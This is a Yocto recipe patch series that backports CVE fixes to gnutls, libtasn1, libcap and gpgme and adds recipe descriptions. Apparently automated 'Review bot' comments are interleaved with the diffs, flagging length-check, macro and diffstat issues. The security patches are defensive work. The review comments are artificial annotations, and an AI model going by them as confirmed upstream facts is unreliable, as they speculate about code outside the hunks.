21--- a/lib/auth/rsa_psk.c
22+++ b/lib/auth/rsa_psk.c
23@@ -269,7 +269,6 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
24 int ret, dsize;
25 ssize_t data_size = _data_size;
26 gnutls_psk_server_credentials_t cred;
27- gnutls_datum_t premaster_secret = { NULL, 0 };
28 volatile uint8_t ver_maj, ver_min;
29
30 cred = (gnutls_psk_server_credentials_t)
31@@ -329,24 +328,48 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
32 ver_maj = _gnutls_get_adv_version_major(session);
33 ver_min = _gnutls_get_adv_version_minor(session);
34
35- premaster_secret.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
36- if (premaster_secret.data == NULL) {
37+ /* Find the key of this username. A random value will be
38+ * filled in if the key is not found.
39+ */
40+ ret = _gnutls_psk_pwd_find_entry(session, info->username,
41+ strlen(info->username), &pwd_psk);
42+ if (ret < 0)
43+ return gnutls_assert_val(ret);
44+
45+ /* Allocate memory for premaster secret, and fill in the
46+ * fields except the decryption result.
47+ */
48+ session->key.key.size = 2 + GNUTLS_MASTER_SIZE + 2 + pwd_psk.size;
49+ session->key.key.data = gnutls_malloc(session->key.key.size);
50+ if (session->key.key.data == NULL) {
51 gnutls_assert();
52+ _gnutls_free_key_datum(&pwd_psk);
53+ /* No need to zeroize, as the secret is not copied in yet */
54+ _gnutls_free_datum(&session->key.key);
55 return GNUTLS_E_MEMORY_ERROR;
56 }
57- premaster_secret.size = GNUTLS_MASTER_SIZE;
58
59 /* Fallback value when decryption fails. Needs to be unpredictable. */
60- ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
61- premaster_secret.size);
62+ ret = gnutls_rnd(GNUTLS_RND_NONCE, session->key.key.data + 2,
63+ GNUTLS_MASTER_SIZE);
64 if (ret < 0) {
65 gnutls_assert();
66- goto cleanup;
67+ _gnutls_free_key_datum(&pwd_psk);
68+ /* No need to zeroize, as the secret is not copied in yet */
69+ _gnutls_free_datum(&session->key.key);
70+ return ret;
71 }
72
73+ _gnutls_write_uint16(GNUTLS_MASTER_SIZE, session->key.key.data);
74+ _gnutls_write_uint16(pwd_psk.size,
75+ &session->key.key.data[2 + GNUTLS_MASTER_SIZE]);
76+ memcpy(&session->key.key.data[2 + GNUTLS_MASTER_SIZE + 2], pwd_psk.data,
77+ pwd_psk.size);
78+ _gnutls_free_key_datum(&pwd_psk);
79+
80 gnutls_privkey_decrypt_data2(session->internals.selected_key, 0,
81- &ciphertext, premaster_secret.data,
82- premaster_secret.size);
83+ &ciphertext, session->key.key.data + 2,
84+ GNUTLS_MASTER_SIZE);
85 /* After this point, any conditional on failure that cause differences
86 * in execution may create a timing or cache access pattern side
87 * channel that can be used as an oracle, so tread carefully */
88@@ -365,31 +388,10 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
89 /* This is here to avoid the version check attack
90 * discussed above.
91 */
92- premaster_secret.data[0] = ver_maj;
93- premaster_secret.data[1] = ver_min;
94+ session->key.key.data[2] = ver_maj;
95+ session->key.key.data[3] = ver_min;
96
97- /* find the key of this username
98- */
99- ret =
100- _gnutls_psk_pwd_find_entry(session, info->username, strlen(info->username), &pwd_psk);
101- if (ret < 0) {
102- gnutls_assert();
103- goto cleanup;
104- }
105-
106- ret =
107- set_rsa_psk_session_key(session, &pwd_psk, &premaster_secret);
108- if (ret < 0) {
109- gnutls_assert();
110- goto cleanup;
111- }
112-
113- ret = 0;
114- cleanup:
115- _gnutls_free_key_datum(&pwd_psk);
116- _gnutls_free_temp_key_datum(&premaster_secret);
117-
118- return ret;
119+ return 0;
120 }
121
122 static int
123--
1242.25.1
125
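Review bot: `pwd_psk.size` is used unchecked in the allocation size `2 + GNUTLS_MASTER_SIZE + 2 + pwd_psk.size` and as the value passed to `_gnutls_write_uint16()`. A key longer than 65535 bytes would get a truncated length prefix while the `memcpy` still copies the full size, so the encoded length and the buffer contents would disagree. Whether `_gnutls_psk_pwd_find_entry()` already caps the key length is not visible here, and the removed `set_rsa_psk_session_key()` call may have behaved the same way. If there is no cap, a guard placed before the allocation (and so before the decryption) would do, e.g. `if (pwd_psk.size > UINT16_MAX) { _gnutls_free_key_datum(&pwd_psk); return gnutls_assert_val(GNUTLS_E_INVALID_REQUEST); }`. `_gnutls_proc_rsa_psk_client_kx` starts outside the hunk.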
diff --git a/meta/recipes-support/gnutls/gnutls_3.6.14.bb b/meta/recipes-support/gnutls/gnutls_3.6.14.bb
index 51578b4b3b..a1451daf2c 100644
--- a/meta/recipes-support/gnutls/gnutls_3.6.14.bb
+++ b/meta/recipes-support/gnutls/gnutls_3.6.14.bb
@@ -1,5 +1,7 @@
1SUMMARY = "GNU Transport Layer Security Library" 1SUMMARY = "GNU Transport Layer Security Library"
2HOMEPAGE = "http://www.gnu.org/software/gnutls/" 2DESCRIPTION = "a secure communications library implementing the SSL, \
3TLS and DTLS protocols and technologies around them."
4HOMEPAGE = "https://gnutls.org/"
3BUGTRACKER = "https://savannah.gnu.org/support/?group=gnutls" 5BUGTRACKER = "https://savannah.gnu.org/support/?group=gnutls"
4 6
5LICENSE = "GPLv3+ & LGPLv2.1+" 7LICENSE = "GPLv3+ & LGPLv2.1+"
@@ -21,6 +23,13 @@ SRC_URI = "https://www.gnupg.org/ftp/gcrypt/gnutls/v${SHRT_VER}/gnutls-${PV}.tar
21 file://arm_eabi.patch \ 23 file://arm_eabi.patch \
22 file://0001-Modied-the-license-to-GPLv2.1-to-keep-with-LICENSE-f.patch \ 24 file://0001-Modied-the-license-to-GPLv2.1-to-keep-with-LICENSE-f.patch \
23 file://CVE-2020-24659.patch \ 25 file://CVE-2020-24659.patch \
26 file://CVE-2021-20231.patch \
27 file://CVE-2021-20232.patch \
28 file://CVE-2022-2509.patch \
29 file://CVE-2021-4209.patch \
30 file://CVE-2023-0361.patch \
31 file://CVE-2023-5981.patch \
32 file://CVE-2024-0553.patch \
24" 33"
25 34
26SRC_URI[sha256sum] = "5630751adec7025b8ef955af4d141d00d252a985769f51b4059e5affa3d39d63" 35SRC_URI[sha256sum] = "5630751adec7025b8ef955af4d141d00d252a985769f51b4059e5affa3d39d63"
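--- /dev/null
+++ b/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch
@@ -0,0 +1,45 @@
+From 22fd12b290adea788122044cb58dc9e77754644f Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Thu, 17 Nov 2022 12:07:50 +0530
+Subject: [PATCH] CVE-2021-46848
+
+Upstream-Status: Backport [https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5]
+CVE: CVE-2021-46848
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+Fix ETYPE_OK off by one array size check.
+---
+ NEWS | 4 ++++
+ lib/int.h | 2 +-
+ 2 files changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/NEWS b/NEWS
+index f042481..d8f684e 100644
+--- a/NEWS
++++ b/NEWS
+@@ -1,5 +1,9 @@
+ GNU Libtasn1 NEWS -*- outline -*-
+
++* Noteworthy changes in release ?.? (????-??-??) [?]
++- Fix ETYPE_OK out of bounds read. Closes: #32.
++- Update gnulib files and various maintenance fixes.
++
+ * Noteworthy changes in release 4.16.0 (released 2020-02-01) [stable]
+ - asn1_decode_simple_ber: added support for constructed definite
+ octet strings. This allows this function decode the whole set of
+diff --git a/lib/int.h b/lib/int.h
+index ea16257..c877282 100644
+--- a/lib/int.h
++++ b/lib/int.h
+@@ -97,7 +97,7 @@ typedef struct tag_and_class_st
+ #define ETYPE_TAG(etype) (_asn1_tags[etype].tag)
+ #define ETYPE_CLASS(etype) (_asn1_tags[etype].class)
+ #define ETYPE_OK(etype) (((etype) != ASN1_ETYPE_INVALID && \
+- (etype) <= _asn1_tags_size && \
++ (etype) < _asn1_tags_size && \
+ _asn1_tags[(etype)].desc != NULL)?1:0)
+
+ #define ETYPE_IS_STRING(etype) ((etype == ASN1_ETYPE_GENERALSTRING || \
+--
+2.25.1
+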
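Review bot: The `NEWS` hunk adds a placeholder release heading (`release ?.? (????-??-??) [?]`) and an unrelated `Update gnulib files and various maintenance fixes.` entry, neither of which describes what this backport changes in 4.16.0. Only the `lib/int.h` hunk carries the fix (`<=` to `<` in `ETYPE_OK`), so I would drop the `NEWS` hunk. That also removes a context dependency on a file that changes every release. Separately, the `From:` and `Subject:` lines name the backporter and the CVE id rather than the upstream author and subject, which leaves the `Upstream-Status` link as the only provenance; keeping the upstream header would make the backport easier to audit.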
diff --git a/meta/recipes-support/gnutls/libtasn1_4.16.0.bb b/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
index 8337b70241..d2b3c492ec 100644
--- a/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
+++ b/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Library for ASN.1 and DER manipulation" 1SUMMARY = "Library for ASN.1 and DER manipulation"
2DESCRIPTION = "A highly portable C library that encodes and decodes \
3DER/BER data following an ASN.1 schema. "
2HOMEPAGE = "http://www.gnu.org/software/libtasn1/" 4HOMEPAGE = "http://www.gnu.org/software/libtasn1/"
3 5
4LICENSE = "GPLv3+ & LGPLv2.1+" 6LICENSE = "GPLv3+ & LGPLv2.1+"
@@ -10,6 +12,7 @@ LIC_FILES_CHKSUM = "file://doc/COPYING;md5=d32239bcb673463ab874e80d47fae504 \
10 12
11SRC_URI = "${GNU_MIRROR}/libtasn1/libtasn1-${PV}.tar.gz \ 13SRC_URI = "${GNU_MIRROR}/libtasn1/libtasn1-${PV}.tar.gz \
12 file://dont-depend-on-help2man.patch \ 14 file://dont-depend-on-help2man.patch \
15 file://CVE-2021-46848.patch \
13 " 16 "
14 17
15DEPENDS = "bison-native" 18DEPENDS = "bison-native"
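--- /dev/null
+++ b/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch
@@ -0,0 +1,24 @@
+From adb1d4e5498a19e9d591ac8f42f9ddfdb23a1354 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Thu, 15 Jul 2021 12:33:13 -0700
+Subject: [PATCH] use closefrom() on linux and glibc 2.34+
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ src/posix-io.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/posix-io.c b/src/posix-io.c
+index e712ef2..ab8ded9 100644
+--- a/src/posix-io.c
++++ b/src/posix-io.c
+@@ -570,7 +570,7 @@ _gpgme_io_spawn (const char *path, char *const argv[], unsigned int flags,
+ if (fd_list[i].fd > fd)
+ fd = fd_list[i].fd;
+ fd++;
+-#if defined(__sun) || defined(__FreeBSD__)
++#if defined(__sun) || defined(__FreeBSD__) || (defined(__GLIBC__) && __GNUC_PREREQ(2, 34))
+ closefrom (fd);
+ max_fds = fd;
+ #else /*!__sun */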
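Review bot: The new condition tests `__GNUC_PREREQ(2, 34)`, which compares the compiler version, while the subject line says the intent is glibc 2.34 or later; the glibc version macro is `__GLIBC_PREREQ`. As written, any glibc build with a compiler reporting a version above 2.34 takes the `closefrom (fd)` branch, including C libraries older than 2.34 that may not declare that function. I would change the line to `#if defined(__sun) || defined(__FreeBSD__) || (defined(__GLIBC__) && __GLIBC_PREREQ(2, 34))`. `_gpgme_io_spawn` starts and ends outside the hunk, so the body of the `#else` branch that handles inherited descriptors on other platforms is not visible here.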
diff --git a/meta/recipes-support/gpgme/gpgme_1.13.1.bb b/meta/recipes-support/gpgme/gpgme_1.13.1.bb
index 6e945d3165..dacc9896e4 100644
--- a/meta/recipes-support/gpgme/gpgme_1.13.1.bb
+++ b/meta/recipes-support/gpgme/gpgme_1.13.1.bb
@@ -20,7 +20,8 @@ SRC_URI = "${GNUPG_MIRROR}/gpgme/${BP}.tar.bz2 \
20 file://0006-fix-build-path-issue.patch \ 20 file://0006-fix-build-path-issue.patch \
21 file://0007-python-Add-variables-to-tests.patch \ 21 file://0007-python-Add-variables-to-tests.patch \
22 file://0008-do-not-auto-check-var-PYTHON.patch \ 22 file://0008-do-not-auto-check-var-PYTHON.patch \
23 " 23 file://0001-use-closefrom-on-linux-and-glibc-2.34.patch \
24 "
24 25
25SRC_URI[md5sum] = "198f0a908ec3cd8f0ce9a4f3a4489645" 26SRC_URI[md5sum] = "198f0a908ec3cd8f0ce9a4f3a4489645"
26SRC_URI[sha256sum] = "c4e30b227682374c23cddc7fdb9324a99694d907e79242a25a4deeedb393be46" 27SRC_URI[sha256sum] = "c4e30b227682374c23cddc7fdb9324a99694d907e79242a25a4deeedb393be46"
diff --git a/meta/recipes-support/iso-codes/iso-codes_4.4.bb b/meta/recipes-support/iso-codes/iso-codes_4.4.bb
index 4767dea84c..e8210eca9b 100644
--- a/meta/recipes-support/iso-codes/iso-codes_4.4.bb
+++ b/meta/recipes-support/iso-codes/iso-codes_4.4.bb
@@ -1,11 +1,14 @@
1SUMMARY = "ISO language, territory, currency, script codes and their translations" 1SUMMARY = "ISO language, territory, currency, script codes and their translations"
2DESCRIPTION = "Provides lists of various ISO standards (e.g. country, \
3language, language scripts, and currency names) in one place, rather \
4than repeated in many programs throughout the system."
2HOMEPAGE = "https://salsa.debian.org/iso-codes-team/iso-codes" 5HOMEPAGE = "https://salsa.debian.org/iso-codes-team/iso-codes"
3BUGTRACKER = "https://salsa.debian.org/iso-codes-team/iso-codes/issues" 6BUGTRACKER = "https://salsa.debian.org/iso-codes-team/iso-codes/issues"
4 7
5LICENSE = "LGPLv2.1" 8LICENSE = "LGPLv2.1"
6LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" 9LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
7 10
8SRC_URI = "git://salsa.debian.org/iso-codes-team/iso-codes.git;protocol=http;branch=main;" 11SRC_URI = "git://salsa.debian.org/iso-codes-team/iso-codes.git;protocol=https;branch=main;"
9SRCREV = "38edb926592954b87eb527124da0ec68d2a748f3" 12SRCREV = "38edb926592954b87eb527124da0ec68d2a748f3"
10 13
11# inherit gettext cannot be used, because it adds gettext-native to BASEDEPENDS which 14# inherit gettext cannot be used, because it adds gettext-native to BASEDEPENDS which
diff --git a/meta/recipes-support/itstool/itstool_2.0.6.bb b/meta/recipes-support/itstool/itstool_2.0.6.bb
index 5f358f463d..54105af5f0 100644
--- a/meta/recipes-support/itstool/itstool_2.0.6.bb
+++ b/meta/recipes-support/itstool/itstool_2.0.6.bb
@@ -1,4 +1,8 @@
1SUMMARY = "ITS Tool allows you to translate your XML documents with PO files" 1SUMMARY = "ITS Tool allows you to translate your XML documents with PO files"
2DESCRIPTION = "It extracts messages from XML files and outputs PO template \
3files, then merges translations from MO files to create translated \
4XML files. It determines what to translate and how to chunk it into \
5messages using the W3C Internationalization Tag Set (ITS). "
2HOMEPAGE = "http://itstool.org/" 6HOMEPAGE = "http://itstool.org/"
3LICENSE = "GPLv3" 7LICENSE = "GPLv3"
4LIC_FILES_CHKSUM = "file://COPYING;md5=59c57b95fd7d0e9e238ebbc7ad47c5a5" 8LIC_FILES_CHKSUM = "file://COPYING;md5=59c57b95fd7d0e9e238ebbc7ad47c5a5"
diff --git a/meta/recipes-support/libassuan/libassuan_2.5.3.bb b/meta/recipes-support/libassuan/libassuan_2.5.3.bb
index 52b4c0f1b9..9ef5074120 100644
--- a/meta/recipes-support/libassuan/libassuan_2.5.3.bb
+++ b/meta/recipes-support/libassuan/libassuan_2.5.3.bb
@@ -1,4 +1,7 @@
1SUMMARY = "IPC library used by GnuPG and GPGME" 1SUMMARY = "IPC library used by GnuPG and GPGME"
2DESCRIPTION = "A small library implementing the so-called Assuan protocol. \
3This protocol is used for IPC between most newer GnuPG components. \
4Both, server and client side functions are provided. "
2HOMEPAGE = "http://www.gnupg.org/related_software/libassuan/" 5HOMEPAGE = "http://www.gnupg.org/related_software/libassuan/"
3BUGTRACKER = "https://bugs.g10code.com/gnupg/index" 6BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
4 7
diff --git a/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb b/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
index 7628eedb1b..3089d1f7ff 100644
--- a/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
+++ b/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
@@ -1,4 +1,5 @@
1SUMMARY = "A library for atomic integer operations" 1SUMMARY = "A library for atomic integer operations"
2DESCRIPTION = "Package provides semi-portable access to hardware-provided atomic memory update operations on a number of architectures."
2HOMEPAGE = "https://github.com/ivmai/libatomic_ops/" 3HOMEPAGE = "https://github.com/ivmai/libatomic_ops/"
3SECTION = "optional" 4SECTION = "optional"
4PROVIDES += "libatomics-ops" 5PROVIDES += "libatomics-ops"
diff --git a/meta/recipes-support/libbsd/libbsd_0.10.0.bb b/meta/recipes-support/libbsd/libbsd_0.10.0.bb
index 5b32b9af41..58925738cb 100644
--- a/meta/recipes-support/libbsd/libbsd_0.10.0.bb
+++ b/meta/recipes-support/libbsd/libbsd_0.10.0.bb
@@ -29,6 +29,12 @@ HOMEPAGE = "https://libbsd.freedesktop.org/wiki/"
29# License: public-domain-Colin-Plumb 29# License: public-domain-Colin-Plumb
30LICENSE = "BSD-3-Clause & BSD-4-Clause & ISC & PD" 30LICENSE = "BSD-3-Clause & BSD-4-Clause & ISC & PD"
31LICENSE_${PN} = "BSD-3-Clause & ISC & PD" 31LICENSE_${PN} = "BSD-3-Clause & ISC & PD"
32LICENSE:${PN}-dbg = "BSD-3-Clause & ISC & PD"
33LICENSE:${PN}-dev = "BSD-3-Clause & ISC & PD"
34LICENSE:${PN}-doc = "BSD-3-Clause & BSD-4-Clause & ISC & PD"
35LICENSE:${PN}-locale = "BSD-3-Clause & ISC & PD"
36LICENSE:${PN}-src = "BSD-3-Clause & ISC & PD"
37LICENSE:${PN}-staticdev = "BSD-3-Clause & ISC & PD"
32LIC_FILES_CHKSUM = "file://COPYING;md5=2120be0173469a06ed185b688e0e1ae0" 38LIC_FILES_CHKSUM = "file://COPYING;md5=2120be0173469a06ed185b688e0e1ae0"
33SECTION = "libs" 39SECTION = "libs"
34 40
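Review bot: The six added per-package lines use the colon form (`LICENSE:${PN}-dbg`, `LICENSE:${PN}-doc`, and so on), while the existing line directly above them uses the underscore form `LICENSE_${PN}`. If this branch's BitBake treats only `_` as the override separator, the new lines would not act as package overrides, and the `BSD-4-Clause` term intended for the -doc package would not reach the license manifest. That is worth confirming against the parser in this tree. If underscore is the active syntax, write them as `LICENSE_${PN}-dbg = "BSD-3-Clause & ISC & PD"` and likewise for -dev, -doc, -locale, -src and -staticdev, so the recipe uses one form throughout.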
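--- /dev/null
+++ b/meta/recipes-support/libcap/files/CVE-2023-2602.patch
@@ -0,0 +1,52 @@
+Backport of:
+
+From bc6b36682f188020ee4770fae1d41bde5b2c97bb Mon Sep 17 00:00:00 2001
+From: "Andrew G. Morgan" <morgan@kernel.org>
+Date: Wed, 3 May 2023 19:18:36 -0700
+Subject: Correct the check of pthread_create()'s return value.
+
+This function returns a positive number (errno) on error, so the code
+wasn't previously freeing some memory in this situation.
+
+Discussion:
+
+ https://stackoverflow.com/a/3581020/14760867
+
+Credit for finding this bug in libpsx goes to David Gstir of
+X41 D-Sec GmbH (https://x41-dsec.de/) who performed a security
+audit of the libcap source code in April of 2023. The audit
+was sponsored by the Open Source Technology Improvement Fund
+(https://ostif.org/).
+
+Audit ref: LCAP-CR-23-01 (CVE-2023-2602)
+
+Signed-off-by: Andrew G. Morgan <morgan@kernel.org>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libcap2/tree/debian/patches/CVE-2023-2602.patch?h=ubuntu/focal-security
+Upstream commit https://git.kernel.org/pub/scm/libs/libcap/libcap.git/commit/?id=bc6b36682f188020ee4770fae1d41bde5b2c97bb]
+CVE: CVE-2023-2602
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ psx/psx.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/libcap/psx.c
++++ b/libcap/psx.c
+@@ -272,7 +272,7 @@ int psx_pthread_create(pthread_t *thread
+
+ psx_wait_for_idle();
+ int ret = pthread_create(thread, attr, start_routine, arg);
+- if (ret != -1) {
++ if (ret == 0) {
+ psx_do_registration(*thread);
+ }
+ psx_resume_idle();
+@@ -287,7 +287,7 @@ int __wrap_pthread_create(pthread_t *thr
+ void *(*start_routine) (void *), void *arg) {
+ psx_wait_for_idle();
+ int ret = __real_pthread_create(thread, attr, start_routine, arg);
+- if (ret != -1) {
++ if (ret == 0) {
+ psx_do_registration(*thread);
+ }
+ psx_resume_idle();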
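Review bot: The patch header no longer matches the patch body: the diffstat names `psx/psx.c` with one insertion and one deletion, while both hunks apply to `libcap/psx.c` and change one line each. The description speaks of memory not being freed, yet the visible hunks only gate `psx_do_registration(*thread)`, which would otherwise run on a `*thread` that a failed create leaves unspecified. I would correct the diffstat to ` libcap/psx.c | 4 ++--` and add one sentence under `Backport of:` saying the change was adapted to this version's file layout, so an auditor comparing against the upstream commit can see why it differs. Both functions start and end outside their hunks.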
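--- /dev/null
+++ b/meta/recipes-support/libcap/files/CVE-2023-2603.patch
@@ -0,0 +1,58 @@
+Backport of:
+
+From 422bec25ae4a1ab03fd4d6f728695ed279173b18 Mon Sep 17 00:00:00 2001
+From: "Andrew G. Morgan" <morgan@kernel.org>
+Date: Wed, 3 May 2023 19:44:22 -0700
+Subject: Large strings can confuse libcap's internal strdup code.
+
+Avoid something subtle with really long strings: 1073741823 should
+be enough for anybody. This is an improved fix over something attempted
+in libcap-2.55 to address some static analysis findings.
+
+Reviewing the library, cap_proc_root() and cap_launcher_set_chroot()
+are the only two calls where the library is potentially exposed to a
+user controlled string input.
+
+Credit for finding this bug in libcap goes to Richard Weinberger of
+X41 D-Sec GmbH (https://x41-dsec.de/) who performed a security audit
+of the libcap source code in April of 2023. The audit was sponsored
+by the Open Source Technology Improvement Fund (https://ostif.org/).
+
+Audit ref: LCAP-CR-23-02 (CVE-2023-2603)
+
+Signed-off-by: Andrew G. Morgan <morgan@kernel.org>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libcap2/tree/debian/patches/CVE-2023-2603.patch?h=ubuntu/focal-security
+Upstream commit https://git.kernel.org/pub/scm/libs/libcap/libcap.git/commit/?id=422bec25ae4a1ab03fd4d6f728695ed279173b18]
+CVE: CVE-2023-2603
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libcap/cap_alloc.c | 12 +++++++-----
+ 1 file changed, 7 insertions(+), 5 deletions(-)
+
+--- a/libcap/cap_alloc.c
++++ b/libcap/cap_alloc.c
+@@ -76,13 +76,22 @@ cap_t cap_init(void)
+ char *_libcap_strdup(const char *old)
+ {
+ __u32 *raw_data;
++ size_t len;
+
+ if (old == NULL) {
+ errno = EINVAL;
+ return NULL;
+ }
+
+- raw_data = malloc( sizeof(__u32) + strlen(old) + 1 );
++ len = strlen(old);
++ if ((len & 0x3fffffff) != len) {
++ _cap_debug("len is too long for libcap to manage");
++ errno = EINVAL;
++ return NULL;
++ }
++ len += sizeof(__u32) + 1;
++
++ raw_data = malloc(len);
+ if (raw_data == NULL) {
+ errno = ENOMEM;
+ return NULL;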
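Review bot: The mask `0x3fffffff` in the new length check is unexplained in the code; the limit (1073741823 bytes) and the reason for it appear only in the commit message. I would add a comment above the check, e.g. `/* reject strings above 0x3fffffff bytes so that len + sizeof(__u32) + 1 cannot wrap */`, so the bound is not loosened later by someone who reads only the source. The header diffstat (`7 insertions(+), 5 deletions(-)`) also disagrees with the visible hunk, which adds ten lines and removes one, so it is worth regenerating for this backport. `_libcap_strdup` continues past the end of the hunk, and the copy into `raw_data` is not visible here.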
diff --git a/meta/recipes-support/libcap/libcap_2.32.bb b/meta/recipes-support/libcap/libcap_2.32.bb
index d78a58f7d2..64d5190aa7 100644
--- a/meta/recipes-support/libcap/libcap_2.32.bb
+++ b/meta/recipes-support/libcap/libcap_2.32.bb
@@ -1,8 +1,10 @@
1SUMMARY = "Library for getting/setting POSIX.1e capabilities" 1SUMMARY = "Library for getting/setting POSIX.1e capabilities"
2DESCRIPTION = "A library providing the API to access POSIX capabilities. \
3These allow giving various kinds of specific privileges to individual \
4users, without giving them full root permissions."
2HOMEPAGE = "http://sites.google.com/site/fullycapable/" 5HOMEPAGE = "http://sites.google.com/site/fullycapable/"
3
4# no specific GPL version required 6# no specific GPL version required
5LICENSE = "BSD | GPLv2" 7LICENSE = "BSD-3-Clause | GPLv2"
6LIC_FILES_CHKSUM = "file://License;md5=3f84fd6f29d453a56514cb7e4ead25f1" 8LIC_FILES_CHKSUM = "file://License;md5=3f84fd6f29d453a56514cb7e4ead25f1"
7 9
8DEPENDS = "hostperl-runtime-native gperf-native" 10DEPENDS = "hostperl-runtime-native gperf-native"
@@ -11,6 +13,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/libs/security/linux-privs/${BPN}2/${BPN}-${
11 file://0001-ensure-the-XATTR_NAME_CAPS-is-defined-when-it-is-use.patch \ 13 file://0001-ensure-the-XATTR_NAME_CAPS-is-defined-when-it-is-use.patch \
12 file://0002-tests-do-not-run-target-executables.patch \ 14 file://0002-tests-do-not-run-target-executables.patch \
13 file://0001-tests-do-not-statically-link-a-test.patch \ 15 file://0001-tests-do-not-statically-link-a-test.patch \
16 file://CVE-2023-2602.patch \
17 file://CVE-2023-2603.patch \
14 " 18 "
15SRC_URI[md5sum] = "7416119c9fdcfd0e8dd190a432c668e9" 19SRC_URI[md5sum] = "7416119c9fdcfd0e8dd190a432c668e9"
16SRC_URI[sha256sum] = "1005e3d227f2340ad1e3360ef8b69d15e3c72a29c09f4894d7aac038bd26e2be" 20SRC_URI[sha256sum] = "1005e3d227f2340ad1e3360ef8b69d15e3c72a29c09f4894d7aac038bd26e2be"
diff --git a/meta/recipes-support/libcheck/libcheck_0.14.0.bb b/meta/recipes-support/libcheck/libcheck_0.14.0.bb
index a88f009cdb..57963d83d4 100644
--- a/meta/recipes-support/libcheck/libcheck_0.14.0.bb
+++ b/meta/recipes-support/libcheck/libcheck_0.14.0.bb
@@ -1,4 +1,9 @@
1SUMMARY = "Check - unit testing framework for C code" 1SUMMARY = "Check - unit testing framework for C code"
2DESCRIPTION = "It features a simple interface for defining unit tests, \
3putting little in the way of the developer. Tests are run in a separate \
4address space, so both assertion failures and code errors that cause \
5segmentation faults or other signals can be caught. Test results are \
6reportable in the following: Subunit, TAP, XML, and a generic logging format."
2HOMEPAGE = "https://libcheck.github.io/check/" 7HOMEPAGE = "https://libcheck.github.io/check/"
3SECTION = "devel" 8SECTION = "devel"
4 9
diff --git a/meta/recipes-support/libcroco/libcroco_0.6.13.bb b/meta/recipes-support/libcroco/libcroco_0.6.13.bb
index a443ff23fe..66ee647ffa 100644
--- a/meta/recipes-support/libcroco/libcroco_0.6.13.bb
+++ b/meta/recipes-support/libcroco/libcroco_0.6.13.bb
@@ -1,4 +1,7 @@
1SUMMARY = "Cascading Style Sheet (CSS) parsing and manipulation toolkit" 1SUMMARY = "Cascading Style Sheet (CSS) parsing and manipulation toolkit"
2DESCRIPTION = "The Libcroco project is an effort to build a generic \
3Cascading Style Sheet (CSS) parsing and manipulation toolkit that can be \
4used by GNOME applications in need of CSS support."
2HOMEPAGE = "http://www.gnome.org/" 5HOMEPAGE = "http://www.gnome.org/"
3BUGTRACKER = "https://bugzilla.gnome.org/" 6BUGTRACKER = "https://bugzilla.gnome.org/"
4 7
diff --git a/meta/recipes-support/libdaemon/libdaemon_0.14.bb b/meta/recipes-support/libdaemon/libdaemon_0.14.bb
index 070ee1890e..85a30bcac3 100644
--- a/meta/recipes-support/libdaemon/libdaemon_0.14.bb
+++ b/meta/recipes-support/libdaemon/libdaemon_0.14.bb
@@ -1,4 +1,8 @@
1SUMMARY = "Lightweight C library which eases the writing of UNIX daemons" 1SUMMARY = "Lightweight C library which eases the writing of UNIX daemons"
2DESCRIPTION = "Lightweight daemon framework for OpenBSD. It provides \
3facilities for logging and a signal handler to enable graceful shutdown, \
4as well as file locking to ensure that only a single copy of a given daemon \
5is running at a time."
2SECTION = "libs" 6SECTION = "libs"
3AUTHOR = "Lennart Poettering <lennart@poettering.net>" 7AUTHOR = "Lennart Poettering <lennart@poettering.net>"
4HOMEPAGE = "http://0pointer.de/lennart/projects/libdaemon/" 8HOMEPAGE = "http://0pointer.de/lennart/projects/libdaemon/"
diff --git a/meta/recipes-support/libevdev/libevdev/determinism.patch b/meta/recipes-support/libevdev/libevdev/determinism.patch
index 33a6076b78..06128a8e7e 100644
--- a/meta/recipes-support/libevdev/libevdev/determinism.patch
+++ b/meta/recipes-support/libevdev/libevdev/determinism.patch
@@ -4,7 +4,8 @@ Sort to remove this inconsistency.
4RP 2020/2/7 4RP 2020/2/7
5 5
6Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> 6Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
7Upstream-Status: Pending 7Submitted: https://lists.freedesktop.org/archives/input-tools/2021-February/001560.html
8Upstream-Status: Backport [https://gitlab.freedesktop.org/libevdev/libevdev/-/commit/8d70f449892c6f7659e07bb0f06b8347677bb7d8]
8 9
9Index: a/libevdev/make-event-names.py 10Index: a/libevdev/make-event-names.py
10=================================================================== 11===================================================================
diff --git a/meta/recipes-support/libevdev/libevdev_1.8.0.bb b/meta/recipes-support/libevdev/libevdev_1.8.0.bb
